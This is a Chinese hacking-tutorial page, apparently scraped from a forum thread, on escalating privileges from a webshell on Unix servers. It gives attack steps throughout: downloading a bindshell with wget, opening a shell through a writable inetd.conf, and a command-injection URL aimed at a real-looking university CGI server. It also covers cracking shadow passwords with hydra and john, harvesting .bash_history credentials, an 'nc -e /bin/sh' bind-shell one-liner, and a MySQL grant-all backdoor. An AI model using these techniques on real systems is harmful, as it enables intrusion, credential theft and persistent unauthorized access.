unix的webshell权限提升方法
unix的webshell权限提升方法
发布时间:2016-12-21 来源:查字典编辑
摘要:大部分技巧来源于我家学究天人的eong大大用wget把bindshell下载到/tmp/目录下或者再/etc/inetd.conf可写的情况...

大部分技巧来源于我家学究天人的eong大大

用wget把bindshell下载到/tmp/目录下

或者再/etc/inetd.conf可写的情况下直接开一个交互的shell

然后用gcc编译

_num=5466654&board=rebarz99&command=down_load&filename=rb9.txt|ls -al" rel=nofollow>http://cgiserver.sogang.ac.kr/~gsvi...ilename=rb9.txt|ls -al|

ls -al显示文件

||中间的是显示的命令

很简单的办法是得到用户

1。我是说用hydra猜测密码,思路混乱的时候打成john跑shadow了。你可能有疑问,有了shell,为什么还要跑普通用户的密码(root经常是不能登陆的)。主要是为了查看.bash_history和其他资料,以及获取一个能够通过ssh/ftp/telnet 登陆的账号。也要考虑到proftpd_0day 之类的是需要一个能够正常登陆的账号的。没有这个webshell我也不会跑了,因为我连用户名(/etc/passwd)都不知道。.bash_history很可能已经包括了你所需要的user/pass.例如mysql的,还包括了管理员通常会访问的其他服务器。当然不是所有机器的访问限制都那么严格。/home对nobody来说也是经常可读的。可是我们必须考虑所有情况。

2。如果你所知道的所有的vul都被补上了,面对所有的suid你都无能为力的时候。也许通过一个可以su -的账号你可以骗出root权限。

3。对于我个人来说,用john跑shadow是为了完善我自己的密码/密码规则库。

4。我从来没有把netcat和pipe 结合一起使用过,没有经验。也请你指教一下。

To blackfox:

搜索suid是有必要的,原因嘛。。不单纯是为了exploit一个suid程序,也反映了管理员的安全意识层次嘛。当然也许这年头还会有suidshell的存在。

exec`nc -l -n -p 60000 -e /bin/sh`

nc下载地址:http://www.leftworld.net/download/show?id=316.html

mysql的ip禁止连接的打开方法:

find / -name my.cnf -print

mysql> grant all on *.* to username@IP identified by 'password';

推荐文章
猜你喜欢
附近的人在看
推荐阅读
拓展阅读
相关阅读
网友关注
最新黑客入侵学习
热门黑客入侵学习
网络安全子分类